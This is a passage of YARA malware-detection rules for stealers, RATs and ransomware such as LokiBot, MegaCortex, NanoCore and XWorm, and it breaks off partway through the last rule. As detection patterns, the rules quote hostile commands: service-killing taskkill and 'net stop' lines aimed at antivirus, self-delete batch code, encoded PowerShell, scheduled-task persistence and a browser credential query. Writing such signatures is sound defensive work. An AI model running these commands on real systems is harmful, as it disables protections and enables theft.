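// Loader/payload XOR idioms shared by LokiBot and (less often) Pony/Fareit. The two rules that
// follow AND this one with family-specific strings, so it must stay defined before them.
rule infostealer_xor_patterns {
    meta:
        author = "jeFF0Falltrades"
        hash = "d5d1d28270adc1588cf6be33a876587a3c689f6a51ea797eae6b64b5b15805b1"
        description = "The XOR and string patterns shown here appear to be unique to certain information-stealing malware families, namely LokiBot and Pony/Fareit. The XOR patterns were observed in a several loaders and payloads for LokiBot, but have also appeared (less frequently) in Pony/Fareit loaders and samples. The two accompanying rules below can be used to further classify the final payloads."

    strings:
        // call dword ptr ds:[<&GetLastInputInfo>]; mov eax,[0x477F60]; sub eax,edi; cmp eax,143
        // User input check in first stage loader (anti-VM). Both addresses (0x477F58/0x477F60) are
        // absolute, so this pattern is specific to one build.
        $hx_get_input = { ff 15 58 7f 47 00 a1 60 7f 47 00 2b c7 3d 43 01 00 00 }

        // xor byte ptr ds:[ecx],45; inc dword ptr ss:[ebp-4]; cmp dword ptr ss:[ebp-4],5E07
        // XOR loop in first stage loader to decrypt the second stage loader (0x5E07 = 24071 bytes, key 0x45)
        $hx_xor_1 = { 80 31 45 FF 45 FC 81 7D FC 07 5E 00 00 }

        // ($hx_xor_3 ^ 0x45)
        // Second stage loader XOR loop pattern as it is stored in first stage loader prior to being XOR'd
        $hx_xor_2 = { c8 51 44 c6 a7 4a cf 51 7f 75 55 05 }

        // lea edx,dword ptr ds:[ecx+eax]; and edx,F; mov dl,byte ptr ds:[edx+edi]; xor byte ptr ds:[eax],dl; inc eax
        // This is ($hx_xor_2 ^ 0x45), found in the second stage loader stub after being XOR'd by the first stage loader
        // (a rolling XOR with a 16-byte key indexed by (ecx+eax) & 0xF)
        $hx_xor_3 = { 8d 14 01 83 e2 0f 8a 14 3a 30 10 40 }

        // xor ecx,0x4358ad54; shr ecx,1; dec eax
        // XOR loop found in final payload
        $hx_xor_4 = { 81 F1 54 AD 58 43 D1 E9 48 }

    condition:
        $hx_xor_4 or 2 of them
}

// Strings common to LokiBot
// (no meta block upstream; depends on infostealer_xor_patterns above)
rule infostealer_loki {
    strings:
        $str_builder = "fuckav.ru" nocase wide ascii
        $str_cyb_fox = "%s\\8pecxstudios\\Cyberfox\\profiles.ini" wide ascii
        // Generic gate name on its own; only meaningful together with the XOR rule.
        $str_c2 = "fre.php" wide ascii

    condition:
        any of them and infostealer_xor_patterns
}

// Strings common to Pony
// (no meta block upstream; depends on infostealer_xor_patterns above)
rule infostealer_pony {
    strings:
        $str_softx = "Software\\SoftX.org\\FTPClient\\Sites" wide ascii
        $str_ftp_plus = "FTP++.Link\\shell\\open\\command" wide ascii
        // Generic gate name on its own; only meaningful together with the XOR rule.
        $str_c2 = "gate.php" wide ascii

    condition:
        any of them and infostealer_xor_patterns
}

// ===== /Broadbased/kleptoparasite.yar =====

// KleptoParasite Stealer (2018): PDB path, browser/Outlook credential strings, C2 and helper names.
rule kleptoparasite {
    meta:
        author = "jarcher"
        hash = "2109fdb52f63a8821a7f3efcc35fa36e759fe8b57db82aa9b567254b8fb03fb1"

    strings:
        // $str_full_pdb contains both $str_part_pdb_*; one PDB hit therefore satisfies "3 of them" by itself.
        $str_full_pdb = "E:\\Work\\HF\\KleptoParasite Stealer 2018\\Version 3\\3 - 64 bit firefox n chrome\\x64\\Release\\Win32Project1.pdb" wide ascii nocase
        $str_part_pdb_1 = "KleptoParasite" wide ascii nocase
        $str_part_pdb_2 = "firefox n chrome" wide ascii nocase
        // Chrome "Login Data" query: generic to credential stealers and recovery tools.
        $str_sql = "SELECT origin_url, username_value, password_value FROM logins" wide ascii nocase
        // NOTE(review): in this copy the leading whitespace byte of the four "NOT INSTALLED"
        // strings was mangled into a line break; it is restored here as a tab (\t) -- confirm
        // against the upstream file.
        $str_chrome_32 = "\tGoogle Chrome 32bit NOT INSTALLED" wide ascii nocase
        $str_firefox_32 = "\tFireFox 32bit NOT INSTALLED" wide ascii nocase
        $str_chrome_64 = "\tGoogle Chrome 64bit NOT INSTALLED" wide ascii nocase
        $str_firefox_64 = "\tFireFox 64bit NOT INSTALLED" wide ascii nocase
        $str_outlook_32 = "Microsoft Outlook 32 bit" wide ascii nocase
        $str_outlook_64 = "Microsoft Outlook 64 bit" wide ascii nocase
        $str_outlook_prof = "Outlook\\Profiles\\Outlook\\" wide ascii
        // NOTE(review): despite the name this looks like SQLite's join-type keyword blob
        // ("natural left outer right full inner cross", select.c), i.e. a library artefact present
        // in anything that statically links SQLite, not obfuscation -- confirm before weighting it.
        $str_obf = "naturaleftouterightfullinnercross" wide ascii nocase
        $str_c2 = "ftp.totallyanonymous.com" wide ascii nocase
        $str_fn = "fc64.exe" wide ascii nocase
        $str_ip = "myexternalip.com/raw" wide ascii
        $str_ret = "IP retriever" wide ascii
        $str_dxwrk = "DXWRK.html" wide ascii

    condition:
        3 of them
}

// ===== /Broadbased/lockergoga.yar =====

// LockerGoga ransomware: ransom-note text, the "Mlcrosoft" typosquat, mutex, and code-signing
// certificate artefacts.
rule lockergoga {
    meta:
        author = "jeFF0Falltrades"
        hash = "bdf36127817413f625d2625d3133760af724d6ad2410bea7297ddc116abc268f"

    strings:
        // Appears to be the MSVC C++ standard-library copyright text, i.e. present in many benign
        // statically linked binaries; it is a weak contributor to the 4-of count.
        $dinkum = "licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED" wide ascii nocase
        $ransom_1 = "You should be thankful that the flaw was exploited by serious people and not some rookies." wide ascii nocase
        $ransom_2 = "Your files are encrypted with the strongest military algorithms RSA4096 and AES-256" wide ascii nocase
        $str_1 = "(readme-now" wide ascii nocase
        $mlcrosoft = "Mlcrosoft" wide ascii nocase
        $mutex_1 = "MX-tgytutrc" wide ascii nocase
        $cert_1 = "16 Australia Road Chickerell" wide ascii nocase
        // 16-byte certificate identifiers as labelled by the author (presumably serial numbers).
        // NOTE(review): if $cert_3/$cert_4 identify the issuing CA rather than the leaf certificate,
        // they are present in every binary signed under that CA and should not be counted as
        // LockerGoga-specific -- verify before tuning the threshold.
        $cert_2 = { 2E 7C 87 CC 0E 93 4A 52 FE 94 FD 1C B7 CD 34 AF } // MIKL LIMITED
        $cert_3 = { 3D 25 80 E8 95 26 F7 85 2B 57 06 54 EF D9 A8 BF } // COMODO RSA Code Signing CA
        $cert_4 = { 4C AA F9 CA DB 63 6F E0 1F F7 4E D8 5B 03 86 9D } // COMODO SECURE

    condition:
        4 of them
}

// ===== /Broadbased/megacortex.yar =====
import "pe"

// Fires on discovered MegaCortex samples using certificate signatures
// Serials are compared as YARA renders them: lowercase, colon-separated hex. The signature
// index range is 0..number_of_signatures-1 (an empty range when there are none).
rule megacortex_payload {
    meta:
        author = "jeFF0Falltrades"
        reference = "https://news.sophos.com/en-us/2019/05/03/megacortex-ransomware-wants-to-be-the-one/"

    condition:
        uint16(0) == 0x5a4d and (
            (for any i in (0..pe.number_of_signatures - 1) : (
                pe.signatures[i].serial == "04:c7:cd:cc:16:98:e2:5b:49:3e:b4:33:8d:5e:2f:8b" or
                pe.signatures[i].serial == "71:a0:b7:36:95:dd:b1:af:c2:3b:2b:9a:18:ee:54:cb" or
                pe.signatures[i].serial == "5a:59:a6:86:b4:a9:04:d0:fc:a0:71:53:ea:6d:b6:cc"))
            or pe.imphash() == "81da9241b26f498f1f7a1123ab76bb9d"
            or pe.imphash() == "ac3a9bb6fa7b3e8b91bfebe68b0d501b"
            or pe.imphash() == "17c56ef351018d9d9dabf0025a0394ac")
}

// Fires on the batch file used to stop AV/other services running prior to executing the MegaCortex payload (NOTE: May not be exclusive to MegaCortex)
rule megacortex_av_bat {
    meta:
        author = "jeFF0Falltrades"

    strings:
        // NOTE(review): $str_1 and $str_2 are two commands run together with no separator
        // ("/Ftaskkill", "/ynet"). As written they only match if the commands really are
        // adjacent in the file; a .bat with normal line breaks will not hit them -- verify
        // against the sample before relying on these two.
        $str_1 = "taskkill /IM agntsvc.exe /Ftaskkill /IM dbeng50.exe /F"
        $str_2 = "net stop SQLAgent$SOPHOS /ynet stop AVP /y"
        $str_3 = "net stop \"Sophos Clean Service\" /y"
        $str_4 = "net stop \"Sophos Device Control Service\" /y"
        $str_5 = "net stop \"Sophos File Scanner Service\" /y"
        $str_6 = "net stop \"Sophos Health Service\" /y"
        $str_7 = "net stop \"Sophos MCS Agent\" /y"
        $str_8 = "net stop \"Sophos MCS Client\" /y"
        $str_9 = "net stop \"Sophos Message Router\" /y"
        $str_10 = "net stop \"Sophos Safestore Service\" /y"
        $str_11 = "net stop \"Sophos System Protection Service\" /y"
        $str_12 = "net stop \"Sophos Web Control Service\" /y"
        $str_13 = "sc config VeeamHvIntegrationSvc start= disabled"
        $str_14 = "sc config MSSQL$VEEAMSQL2012 start"
        $str_15 = "sc config SQLAgent$CXDB start= disabled"
        $str_16 = "taskkill /IM zoolz.exe /F"
        // Fix: the upstream $str_17 was a byte-for-byte duplicate of $str_1, so one occurrence
        // counted twice toward "5 of them". It is removed; the numbering gap is intentional.
        $str_18 = "taskkill /IM wordpad.exe /F"
        $str_19 = "taskkill /IM xfssvccon.exe /F"
        $str_20 = "taskkill /IM tmlisten.exe /F"
        $str_21 = "taskkill /IM PccNTMon.exe /F"
        $str_22 = "taskkill /IM CNTAoSMgr.exe /F"
        $str_23 = "taskkill /IM Ntrtscan.exe /F"
        $str_24 = "taskkill /IM mbamtray.exe /F"
        $str_25 = "iisreset /stop"

    condition:
        5 of them
}

// Fires on the ransom note left behind MegaCortex ("!!!_READ_ME_!!!.txt")
rule megacortex_ransom {
    meta:
        author = "jeFF0Falltrades"

    strings:
        $megacortex = "corrupted with MegaCortex" nocase
        // Four bytes and very common; it can only ever supply one of the two required hits.
        $tsv = ".tsv"
        $morpheus = "We can only show you the door"
        $files = "email to us 2 files from random computers"
        $email_1 = "shawhart1542925@mail.com"
        $email_2 = "anderssperry6654818@mail.com"
        $email_3 = "ezequielgramlich6204294@mail.com"
        $email_4 = "cammostyn9012404@mail.com"

    condition:
        2 of them
}

// (WIP) Fires on meterpreter payloads found beaconing to a C2 discovered in the MegaCortex attacks (89[.]105[.]198[.]28)
rule megacortex_meterpreter {
    meta:
        author = "jeFF0Falltrades"

    strings:
        // Certificate subject fragment. The trailing "1" is most likely the 0x31 (SET) tag of the
        // next RDN in the DER-encoded subject, i.e. this matches the raw certificate bytes -- confirm.
        $cert = "Bud. 120-A, Vul. Balkivska1"

    condition:
        // Fix: upstream wrote these serials in UPPERCASE. YARA's pe module renders serial as
        // lowercase colon-separated hex (compare megacortex_payload above) and "==" is
        // case-sensitive, so the signature clause could never be true and -- being AND'ed with
        // $cert -- neither could this rule. Serials are now lowercase and the index range is
        // 0..number_of_signatures-1.
        uint16(0) == 0x5a4d and $cert and (for any i in (0..pe.number_of_signatures - 1) : (
            pe.signatures[i].serial == "00:ca:0e:70:90:d4:82:70:04:c9:9a:f2:fc:7d:73:3c:02" or
            pe.signatures[i].serial == "1d:a2:48:30:6f:9b:26:18:d0:82:e0:96:7d:33:d3:6a" or
            pe.signatures[i].serial == "01:fd:6d:30:fc:a3:ca:51:a8:1b:bc:64:0e:35:03:2d" or
            pe.signatures[i].serial == "03:01:9a:02:3a:ff:58:b1:6b:d6:d5:ea:e6:17:f0:66" or
            pe.signatures[i].serial == "06:fd:f9:03:96:03:ad:ea:00:0a:eb:3f:27:bb:ba:1b" or
            pe.signatures[i].serial == "0c:e7:e0:e5:17:d8:46:fe:8f:e5:60:fc:1b:f0:30:39"))
}

// (WIP) Fires on Rietspoof samples found loading MegaCortex, based on certificates
rule megacortex_rietspoof {
    meta:
        author = "jeFF0Falltrades"

    strings:
        // Certificate subject fragment; trailing "1" as in megacortex_meterpreter (likely a DER SET tag).
        $cert = "8 Quarles Park Road1"

    condition:
        // Fix: same as megacortex_meterpreter -- serials lowercased to match YARA's rendering
        // (upstream's uppercase literals could never compare equal) and the index range bounded
        // at number_of_signatures-1. The $cert branch was the only part that could fire before.
        uint16(0) == 0x5a4d and ($cert or (for any i in (0..pe.number_of_signatures - 1) : (
            pe.signatures[i].serial == "53:cc:4c:69:e5:6a:7d:bc:36:67:d5:ff:d5:24:aa:4b" or
            pe.signatures[i].serial == "1d:a2:48:30:6f:9b:26:18:d0:82:e0:96:7d:33:d3:6a" or
            pe.signatures[i].serial == "13:ea:28:70:5b:f4:ec:ed:0c:36:63:09:80:61:43:36" or
            pe.signatures[i].serial == "0e:cf:f4:38:c8:fe:bf:35:6e:04:d8:6a:98:1b:1a:50" or
            pe.signatures[i].serial == "7e:93:eb:fb:7c:c6:4e:59:ea:4b:9a:77:d4:06:fc:3b" or
            pe.signatures[i].serial == "00:ad:72:9a:65:f1:78:47:ac:b8:f8:49:6a:76:80:ff:1e" or
            pe.signatures[i].serial == "01:fd:6d:30:fc:a3:ca:51:a8:1b:bc:64:0e:35:03:2d")))
}

// ===== /Broadbased/metamorfo.yar =====

// Metamorfo initial MSI payloads: fragments of the embedded JScript/VBScript custom action.
rule metamorfo_msi {
    meta:
        author = "jeFF0Falltrades"
        ref = "https://blog.trendmicro.com/trendlabs-security-intelligence/analysis-abuse-of-custom-actions-in-windows-installer-msi-to-run-malicious-javascript-vbscript-and-powershell-scripts/"
        description = "This is a simple, albeit effective rule to detect most Metamorfo initial MSI payloads"

    strings:
        $str_1 = "replace(\"pussy\", idpp)" wide ascii nocase
        $str_2 = "GAIPV+idpp+\"\\\\\"+idpp" wide ascii nocase
        $str_3 = "StrReverse(\"TEG\")" wide ascii nocase  // reversed "GET"
        // Presumably the tail of an installer-builder banner ("...taller 12.2.1"); not confirmable here.
        $str_4 = "taller 12.2.1" wide ascii nocase
        $str_5 = "$bExisteArquivoLog" wide ascii nocase
        // NOTE(review): $str_6 and $str_11 come from a widely copied JScript unzip helper; the two
        // together satisfy "2 of them", so expect occasional hits on benign scripts.
        $str_6 = "function unzip(zipfile, unzipdir)" wide ascii nocase
        $str_7 = "DonaLoad(ArquivoDown" wide ascii nocase
        $str_8 = "putt_start" wide ascii nocase
        $str_9 = "FilesInZip= zipzipp" wide ascii nocase
        $str_10 = "@ u s e r p r o f i l e @\"+ppasta" wide ascii nocase
        $str_11 = "getFolder(unzipdir).Path" wide ascii nocase

    condition:
        2 of them
}

// ===== /Broadbased/nanocore.yar =====
import "pe"

// NanoCore RAT client: plugin-host strings, a config-loading CIL loop and one known compile timestamp.
rule nanocore_rat {
    meta:
        author = "jeFF0Falltrades"

    strings:
        // $str_nano_2 contains $str_nano_1, so one "NanoCore.ClientPluginHost" hit already meets "2 of ($str_*)".
        $str_nano_1 = "NanoCore.ClientPlugin" wide ascii
        $str_nano_2 = "NanoCore.ClientPluginHost" wide ascii
        $str_plg_1 = "Plugin [{0}] requires an update" wide ascii
        $str_plg_2 = "Plugin [{0}] is being uninstalled" wide ascii
        $str_conn_1 = "PrimaryConnectionHost" wide ascii
        $str_conn_2 = "BackupConnectionHost" wide ascii
        $str_id = "C8AA-4E06-9D54-CF406F661572" wide ascii  // partial GUID
        // Loop used to load in config
        // CIL: ldarg.0; ldloc.0; ldelem.ref; castclass <TypeRef 0x01000054>; stloc.1;
        //      ldarg.0; ldloc.0; ldc.i4.1; add; ldelem.ref; call <MemberRef 0x0A00003A>
        //      (reads args[i] and args[i+1]); the fixed tokens make it build-specific.
        $load_config = { 02 06 9A 74 54 00 00 01 0B 02 06 17 58 9A 28 3A 00 00 0A }

    condition:
        // 1424566177 is a Feb-2015 PE compile timestamp; pe.timestamp is undefined (false) on non-PE input.
        2 of ($str_*) or $load_config or (pe.timestamp == 1424566177)
}

// NanoCore SurveillanceEx plugin (keylogging, DNS-cache logging, password recovery).
rule nanocore_surveillance_plugin {
    meta:
        author = "jeFF0Falltrades"

    strings:
        $str_name = "SurveillanceExClientPlugin.dll" wide ascii
        $str_keylog = "KeyboardLogging" wide ascii
        $str_dns_log = "DNSLogging" wide ascii
        // NOTE(review): $str_html_1/$str_html_2 look like regex templates whose HTML tags were
        // stripped when this page was extracted (only the capture groups remain); verify the
        // literals against the upstream file before deploying.
        $str_html_1 = ".+?(.+?)(.+?).+?.+?.+?.+?.+?(.+?)" wide ascii
        $str_html_2 = "(.+?)(.+?)(.+?)(.+?)" wide ascii
        // "/shtml <file>" is the HTML-export switch of the NirSoft recovery utilities -- presumably
        // what ExecutePasswordTool invokes.
        $str_html_3 = "/shtml \"{0}\"" wide ascii
        $str_rsrc_lzma = "Lzma" wide ascii   // four chars, generic
        $str_nano = "NanoCore.ClientPlugin" wide ascii
        $str_pass_tool = "ExecutePasswordTool" wide ascii
        // CIL: ldc.i4 0x10000003 (RID_INPUT); ldloca.s 2; ldloca.s 4; ldarg.0; ldfld <Field>; call <MethodDef>
        $get_raw_input = { 20 03 00 00 10 12 02 12 04 02 7B 09 00 00 04 28 C8 00 00 06 } // GetRawInputData Loop
        // CIL: ldloca.s 2; ldfld <Field>; ldsfld <MemberRef>; call <MemberRef>; brfalse.s -75 (backward branch = loop)
        $get_dns_cache = { 12 02 7B 62 00 00 04 7E 7F 00 00 0A 28 80 00 00 0A 2C B5 } // GetDNSCacheDataTable Loop

    condition:
        (all of ($get_*)) or (3 of ($str_*)) or (pe.timestamp == 1424566189)
}

// ===== /Broadbased/netwire.yar =====

// NetWire RAT: self-delete batch template, sleep-via-ping, user-agent and log-encryption fragment.
rule netwire {
    meta:
        author = "jeFF0Falltrades"
        hash = "80214c506a6c1fd8b8cd2cd80f8abddf6b771a4b5808a06636b6264338945a7d"

    strings:
        // 192.0.2.2 is in the TEST-NET-1 documentation range, so the ping is just a delay.
        $ping = "ping 192.0.2.2 -n 1 -w %d >nul 2>&1" wide ascii nocase
        $bat_1 = "DEL /s \"%s\" >nul 2>&1" wide ascii nocase
        $bat_2 = "call :deleteSelf&exit /b" wide ascii nocase
        $bat_3 = "start /b \"\" cmd /c del \"%%~f0\"&exit /b" wide ascii nocase
        $ua = "User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" wide ascii nocase
        $log = "[Log Started]" wide ascii nocase
        $xor = { 0F B6 00 83 F0 ?? 83 C0 ?? 88 02 } // movzx eax, byte ptr [eax]; xor eax, ??; add eax, ??; mov [edx], al (XOR encryption of log data)

    condition:
        4 of them
}

// ===== /Broadbased/parallax_rat.yar =====

// Parallax RAT (2020): VBS self-delete / uninstall strings, clipboard markers, keylogger fragment.
rule parallax_rat_2020 {
    meta:
        author = "jeFF0Falltrades"

    strings:
        $str_ws = ".DeleteFile(Wscript.ScriptFullName)" wide ascii
        $str_cb_1 = "Clipboard Start" wide ascii
        $str_cb_2 = "Clipboard End" wide ascii
        $str_un = "UN.vbs" wide ascii
        // If instruction-aligned: fs: and al,imm8; ror dl,0xFA. Only 5 fixed bytes, so it leans on
        // the 3-of threshold.
        $hex_keylogger = { 64 24 ?? C0 CA FA }

    condition:
        3 of them
}

// ===== /Broadbased/quasarrat.yar =====
rule quasarrat {
    meta:
        author = "jeFF0Falltrades"

    strings:
        $str_quasar = "Quasar." wide ascii
        $str_quasar_app = "QuasarApplication" wide ascii
        $str_quasar_client = "Quasar.Client" wide ascii
        $str_enable_logger = "ENABLELOGGER" wide ascii
        $str_hidden = "set_Hidden" wide ascii
        $str_shell = "DoShellExecuteResponse" wide ascii
        $str_close = "echo DONT CLOSE THIS WINDOW!"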
wide ascii 13 | $str_pause = "ping -n 10 localhost > nul" wide ascii 14 | $str_reconnect_delay = "RECONNECTDELAY" wide ascii 15 | $str_aes_exc = "masterKey can not be null or empty" wide ascii 16 | $byte_aes_key_base = { 7E [3] 04 73 [3] 06 25 } 17 | $byte_aes_salt_base = { BF EB 1E 56 FB CD 97 3B B2 19 } 18 | $byte_special_folder = { 7e 73 [4] 28 [4] 80 } 19 | $patt_config = { 72 [3] 70 80 [3] 04 } 20 | $patt_verify_hash = { 7e [3] 04 6f [3] 0a 6f [3] 0a 74 [3] 01 } 21 | 22 | condition: 23 | 5 of them and #patt_config >= 10 24 | } 25 | -------------------------------------------------------------------------------- /Broadbased/redline.yar: -------------------------------------------------------------------------------- 1 | rule redline_dropper { 2 | meta: 3 | author = "jeFF0Falltrades" 4 | hash = "6d477b08a0b9c1e8db4ecb921d07b124973f5213639d88fff7df5146adcefc79" 5 | description = "This rule matches droppers that appear to be related to samples of RedLine Stealer or a derivation (as of APR2021)" 6 | 7 | strings: 8 | $str_0 = "RayCastingCSHARP.Properties.Resources.resources" wide ascii 9 | $str_1 = "VOICEPHILIN" wide ascii 10 | $str_2 = "TRUECITY" wide ascii 11 | $str_3 = "Ronald RayGun" wide ascii 12 | $str_4 = "MR POLICE" wide ascii 13 | $hex_0 = { 06 12 09 28 ?? 00 00 0A 6F ?? 00 00 0A 06 12 09 28 ?? 00 00 0A 6F ?? 00 00 0A 06 12 09 28 ?? 00 00 0A 6F ?? 00 00 0A } 14 | 15 | condition: 16 | 2 of them 17 | } 18 | 19 | rule redline_stealer { 20 | meta: 21 | author = "jeFF0Falltrades" 22 | hash = "f64ed3bd7304cdec6e99bb35662aa485e32156c1ca7275fed0c1e67d2f9fc139" 23 | description = "This rule matches unpacked RedLine Stealer samples and derivatives (as of APR2021)" 24 | 25 | strings: 26 | $str_0 = "Software\\Valve\\SteamLogin Data" wide ascii 27 | $str_1 = "name_on_cardencrypted_value" wide ascii 28 | $str_2 = "card_number_encrypted" wide ascii 29 | $str_3 = "geoplugin_region!" 
wide ascii 30 | $str_4 = "set_GameChatFiles" wide ascii 31 | $str_5 = "set_ScanDiscord" wide ascii 32 | $str_6 = "k__BackingField" wide ascii 33 | 34 | condition: 35 | 3 of them 36 | } 37 | -------------------------------------------------------------------------------- /Broadbased/remcos.yar: -------------------------------------------------------------------------------- 1 | import "pe" 2 | 3 | rule remcos_rat { 4 | meta: 5 | author = "jeFF0Falltrades" 6 | 7 | strings: 8 | $str_upload = "Uploading file to C&C" wide ascii 9 | $str_keylog_1 = "Offline Keylogger Started" wide ascii 10 | $str_keylog_2 = "Online Keylogger Started" wide ascii 11 | $str_mutex_1 = "Mutex_RemWatchdog" wide ascii 12 | $str_mutex_2 = "Remcos_Mutex_Inj" wide ascii 13 | $str_cleared = "Cleared all cookies & stored logins!" wide ascii 14 | $str_bs_vendor = "Breaking-Security.Net" wide ascii 15 | $str_controller = "Connecting to Controller..." wide ascii 16 | $str_rc4 = { 40 8b cb 99 f7 f9 8b 84 95 f8 fb ff ff 8b f3 03 45 fc 89 55 f8 8d 8c 95 f8 fb ff ff 99 f7 fe 8a 01 8b f2 8b 94 b5 f8 fb ff ff } // RC4 PRGA 17 | 18 | condition: 19 | 3 of ($str*) or (pe.sections[0].name == "VVR" and pe.sections[1].name == "ZKZR" and pe.sections[2].name == ".test" and pe.sections[3].name == "rca" and pe.sections[4].name == "vga") 20 | } 21 | -------------------------------------------------------------------------------- /Broadbased/ursnif_gozi_isfb.yar: -------------------------------------------------------------------------------- 1 | rule ursnif_zip_2019 { 2 | meta: 3 | author = "jeFF0Falltrades" 4 | reference = "https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html" 5 | 6 | strings: 7 | $doc_name = { 69 6e 66 6f 5f ?? ?? 2e ?? ?? 
2e 64 6f 63 } // info_MM.DD.doc 8 | $zip_header = { 50 4B 03 04 } 9 | $zip_footer = { 50 4B 05 06 00 } 10 | 11 | condition: 12 | ($zip_header at 0) and ($doc_name in (0..48)) and ($zip_footer in (filesize-150..filesize)) 13 | } 14 | 15 | rule ursnif_dropper_doc_2019 { 16 | meta: 17 | author = "jeFF0Falltrades" 18 | reference = "https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html" 19 | 20 | strings: 21 | $sleep = "WScript.Sleep(56000)" wide ascii nocase 22 | $js = ".js" wide ascii 23 | $ret = { 72 65 74 75 72 6e 20 22 52 75 22 20 2b 20 22 5c 78 36 65 22 } // return "Ru" + "\x6e" 24 | $pse = { 70 6f 77 65 72 73 68 65 6c 6c 20 2d 45 6e 63 20 } //powershell -Enc 25 | 26 | condition: 27 | uint16(0) == 0xcfd0 and all of them 28 | } -------------------------------------------------------------------------------- /Broadbased/venomrat.yar: -------------------------------------------------------------------------------- 1 | rule venomrat { 2 | meta: 3 | author = "jeFF0Falltrades" 4 | 5 | strings: 6 | $str_id_venomrat = "venomrat" wide ascii nocase 7 | $str_hvnc = "HVNC_REPLY_MESSAGE" wide ascii 8 | $str_offline_keylogger = "OfflineKeylog sending...." 
wide ascii 9 | $str_videocontroller = "select * from Win32_VideoController" wide ascii 10 | $byte_aes_key_base = { 7E [3] 04 73 [3] 06 80 } 11 | $patt_config = { 72 [3] 70 80 [3] 04 } 12 | $patt_keylog = {73 [3] 06 80 [3] 04} 13 | $patt_verify_hash = { 7e [3] 04 6f [3] 0a 6f [3] 0a 74 [3] 01 } 14 | 15 | condition: 16 | 5 of them and #patt_config >= 10 17 | } 18 | -------------------------------------------------------------------------------- /Broadbased/wsh_rat.yar: -------------------------------------------------------------------------------- 1 | rule wsh_rat_vbs_decoded 2 | { 3 | meta: 4 | author = "jeFF0Falltrades" 5 | ref = "https://cofense.com/houdini-worm-transformed-new-phishing-attack" 6 | description = "Alerts on the decoded WSH RAT VBScript" 7 | 8 | strings: 9 | $str_0 = "wshsdk" wide ascii nocase 10 | $str_1 = "wshlogs" wide ascii nocase 11 | $str_2 = "WSHRAT" wide ascii nocase 12 | $str_3 = "WSH Sdk for password recovery" wide ascii nocase 13 | $str_4 = "wshlogs\\recovered_password_email.log" wide ascii nocase 14 | $str_5 = "post (\"is-ready\",\"\")" wide ascii nocase 15 | $str_6 = "split (response,spliter)" wide ascii nocase 16 | $str_7 = "updatestatus(\"SDK+Already+Installed\")" wide ascii nocase 17 | $str_8 = "case \"get-pass-offline\"" wide ascii nocase 18 | $str_9 = "case \"up-n-exec\"" wide ascii nocase 19 | $str_10 = "Unable to automatically recover password" wide ascii nocase 20 | $str_11 = "reverseproxy" wide ascii nocase 21 | $str_12 = "keyloggerstarter" wide ascii nocase 22 | 23 | condition: 24 | 3 of ($str*) 25 | } 26 | 27 | rule wsh_rat_keylogger 28 | { 29 | meta: 30 | author = "jeFF0Falltrades" 31 | ref = "https://cofense.com/houdini-worm-transformed-new-phishing-attack" 32 | description = "Alerts on the WSH RAT .NET keylogger module" 33 | 34 | 35 | strings: 36 | $str_0 = "Keylogger" wide ascii nocase 37 | $str_1 = "RunKeyloggerOffline" wide ascii nocase 38 | $str_2 = "saveKeyLog" wide ascii nocase 39 | $str_3 = "sendKeyLog" wide ascii 
nocase 40 | $str_4 = "/open-keylogger" wide ascii nocase 41 | $str_5 = "wshlogs" wide ascii nocase 42 | $str_6 = "WSHRat Plugin" wide ascii nocase 43 | $str_7 = "Debug\\Keylogger.pdb" wide ascii nocase 44 | 45 | condition: 46 | 3 of them 47 | } 48 | 49 | rule wsh_rat_rdp 50 | { 51 | meta: 52 | author = "jeFF0Falltrades" 53 | ref = "https://cofense.com/houdini-worm-transformed-new-phishing-attack" 54 | description = "Alerts on the WSH RAT .NET RDP module" 55 | 56 | strings: 57 | $str_0 = "GET /open-rdp|" wide ascii nocase 58 | $str_1 = "WSHRat Plugin" wide ascii nocase 59 | $str_2 = "Debug\\RDP.pdb" wide ascii nocase 60 | $str_3 = "TakeShoot" wide ascii nocase 61 | $str_4 = "CompressJPEG" wide ascii nocase 62 | 63 | condition: 64 | 3 of them 65 | } 66 | 67 | 68 | rule wsh_rat_reverse_proxy 69 | { 70 | meta: 71 | author = "jeFF0Falltrades" 72 | ref = "https://cofense.com/houdini-worm-transformed-new-phishing-attack" 73 | description = "Alerts on the WSH RAT .NET reverse proxy module" 74 | 75 | strings: 76 | $str_0 = "RProxy:" wide ascii nocase 77 | $str_1 = "WSH Inc" wide ascii nocase 78 | $str_2 = "WSH Reverse Proxy" wide ascii nocase 79 | $str_3 = "Debug\\ReverseProxy.pdb" wide ascii nocase 80 | $str_4 = "WshRP" wide ascii nocase 81 | $str_5 = "NotifyBringNewSocket" wide ascii nocase 82 | 83 | condition: 84 | 3 of them 85 | } 86 | -------------------------------------------------------------------------------- /Broadbased/xenorat.yar: -------------------------------------------------------------------------------- 1 | rule xenorat { 2 | meta: 3 | author = "jeFF0Falltrades" 4 | 5 | strings: 6 | $str_xeno_rat_1 = "xeno rat" wide ascii nocase 7 | $str_xeno_rat_2 = "xeno_rat" wide ascii nocase 8 | $str_xeno_update_mgr = "XenoUpdateManager" wide ascii 9 | $str_nothingset = "nothingset" wide ascii 10 | $byte_enc_dec_pre = { 1f 10 8d [4] (0a | 0b) } 11 | $patt_config = { 72 [3] 70 80 [3] 04 } 12 | 13 | condition: 14 | 4 of them and #patt_config >= 5 15 | } 16 | 
--------------------------------------------------------------------------------
/Broadbased/xworm.yar:
--------------------------------------------------------------------------------
1 | rule xworm {
2 |     meta:
3 |         author = "jeFF0Falltrades"
4 |
5 |     strings:
6 |         $str_xworm = "xworm" wide ascii nocase // NOTE(review): nocase substring of $str_xwormmm, so both fire on one "Xwormmm" occurrence
7 |         $str_xwormmm = "Xwormmm" wide ascii
8 |         $str_xclient = "XClient" wide ascii
9 |         $str_xlogger = "XLogger" wide ascii
10 |         $str_xchat = "Xchat" wide ascii
11 |         $str_default_log = "\\Log.tmp" wide ascii // per the name, the default log path suffix
12 |         $str_create_proc = "/create /f /RL HIGHEST /sc minute /mo 1 /t" wide ascii // schtasks.exe arguments: create (force), run with highest privileges, every minute — the persistence task
13 |         $str_ddos_start = "StartDDos" wide ascii // C2 commands for the flood module (per the names)
14 |         $str_ddos_stop = "StopDDos" wide ascii
15 |         $str_timeout = "timeout 3 > NUL" wide ascii // batch sleep, typical of a self-delete/restart .bat
